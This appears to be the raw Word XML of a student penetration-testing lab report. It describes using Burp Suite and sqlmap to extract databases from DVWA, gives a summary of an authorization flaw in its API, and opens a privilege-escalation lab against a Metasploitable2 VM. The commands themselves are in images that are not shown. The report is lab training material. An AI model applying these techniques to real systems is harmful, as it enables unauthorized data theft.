                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5327015" cy="2526030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F530BC4" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5FF750D8" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2DE54503" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4F955610" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2F1372B7" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="18249439" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4E571BF5" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7ED86A41" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0C92A285" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="4FB7A91D" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="41D0A5CB" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="34A84D9A" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="5510A4F9" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="5C760981" w14:textId="43ABC95B" w:rsidR="00C46746" w:rsidRPr="008575EA" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="4F71412A" w14:textId="3058802D" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00C46746" w:rsidP="00657DED">
      <w:r w:rsidRPr="008575EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AE3F769" wp14:editId="55B63EB4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>59055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5228590" cy="3646170"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="11430"/>
            <wp:wrapNone/>
            <wp:docPr id="875796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796798" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5228590" cy="364617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46DDC458" w14:textId="778F5D57" w:rsidR="00657DED" w:rsidRPr="008575EA" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="44C246E0" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6C25D038" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="01B1F42D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="22F11154" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="15329917" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5127BC1B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7C682CD9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="438D8741" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="278A9D5C" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0BC3969C" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="69759D62" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6023BA13" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="55A6664F" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7D096F1A" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="63EA6959" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="313F7F89" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="35D836E6" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="3077586F" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="27D475CF" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="66D941DB" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="6AE4D1D7" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="783EC24F" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="2023181D" w14:textId="77777777" w:rsidR="00C46746" w:rsidRDefault="00C46746" w:rsidP="00657DED"/>
    <w:p w14:paraId="6BAFC4C1" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="511C1B12" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3E475E3A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="52F6A4FF" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5B24A0E1" w14:textId="113848A7" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B504CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52788E58" wp14:editId="7EDBF9B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>269848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4683318" cy="3504983"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="19685"/>
            <wp:wrapNone/>
            <wp:docPr id="520053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053251" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4683318" cy="3504983"/>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t>Save the captured request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CB434" w14:textId="12D1AF21" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5ED9E7E9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="68A2B83F" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="45834A96" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="58D14671" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="6F8830BE" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="56C2E51B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0DDC0EDC" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4E32BD6D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="25772CAC" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="69CD1D6A" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="5EE3D69A" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="2EA87447" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="769F0982" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="0CAC0255" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="26DEE97C" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRPr="00B504CF" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="0B99DE96" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="28FCC7C2" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="048817DA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00B504CF" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7407A669" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="64880E64" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Run sqlmap to extract databases from the captured request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D0318" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="054F100C" wp14:editId="4527493E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>58200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3200400" cy="552450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1715123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123371" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="552450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C97B8" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="460A130A" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRPr="004844F4" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="68A54C2D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="28684E90" w14:textId="342ADAD0" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F31A1CC" wp14:editId="505C2F41">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>284121</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2504661" cy="1106047"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="577704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704234" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2504661" cy="1106047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Databases found. This confirms SQL Injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449AB996" w14:textId="0C47A8FE" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7ECE9012" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="002864D8" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="557A07E9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="002864D8" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="458E5BC6" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="07F2F1BC" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="72E6784E" w14:textId="77777777" w:rsidR="009C06F6" w:rsidRPr="002864D8" w:rsidRDefault="009C06F6" w:rsidP="00657DED"/>
    <w:p w14:paraId="01638483" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="002864D8" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="089B4002" w14:textId="77777777" w:rsidR="00394858" w:rsidRDefault="00394858" w:rsidP="00657DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DF574D" w14:textId="15B9811F" w:rsidR="00657DED" w:rsidRPr="000C0A09" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0A09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Word API Test Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50250A47" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:r w:rsidRPr="000C0A09">
        <w:t>API security testing was conducted on the DVWA API using Burp Suite and sqlmap. Multiple endpoints were enumerated and tested against OWASP API Top 10 vulnerabilities. Critical Broken Object Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A09">
        <w:t>vulnerabilit</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A09">
        <w:t xml:space="preserve"> identified, allowing unauthorized data access and database manipulation through improperly validated API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4863C5" w14:textId="77777777" w:rsidR="0029418F" w:rsidRDefault="0029418F" w:rsidP="00657DED"/>
    <w:p w14:paraId="0F236101" w14:textId="77777777" w:rsidR="0029418F" w:rsidRDefault="0029418F" w:rsidP="00657DED"/>
    <w:p w14:paraId="36B17071" w14:textId="77777777" w:rsidR="0029418F" w:rsidRDefault="0029418F" w:rsidP="00657DED"/>
    <w:p w14:paraId="52009FFC" w14:textId="77777777" w:rsidR="00113511" w:rsidRDefault="00113511" w:rsidP="00113511"/>
    <w:p w14:paraId="7CF7CAED" w14:textId="760C09EE" w:rsidR="00E24048" w:rsidRDefault="00E268B0" w:rsidP="00E268B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc224731503"/>
      <w:r w:rsidRPr="00E268B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation and Persistence Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3EABBBE6" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Record the Ip address of Metaspolitable2 target VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D543DD8" w14:textId="4AAE3BD0" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6935B817" wp14:editId="4D7B1659">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>294005</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4674870" cy="3046730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="332547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547000" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4674870" cy="3046730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>The Ip address is 192.168.1.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D578C4" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="2F869CE5" w14:textId="5F689879" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5A3DBEAD" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0DC8E99D" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6FB6DBB0" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5516DCDB" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6923A961" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="1825D6B1" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7EA9FFB7" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="741DB0B9" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6B9427C4" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="3453EDFB" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="57783889" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="20835190" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="78CAFBA0" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6BA8B4D1" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5AC41141" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="2ED6DB88" w14:textId="209C21C5" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="03B0BFFC" w14:textId="20C855F7" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C4F6A27" wp14:editId="4143C63A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3859536" cy="3737113"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1178195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95833" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3859536" cy="3737113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
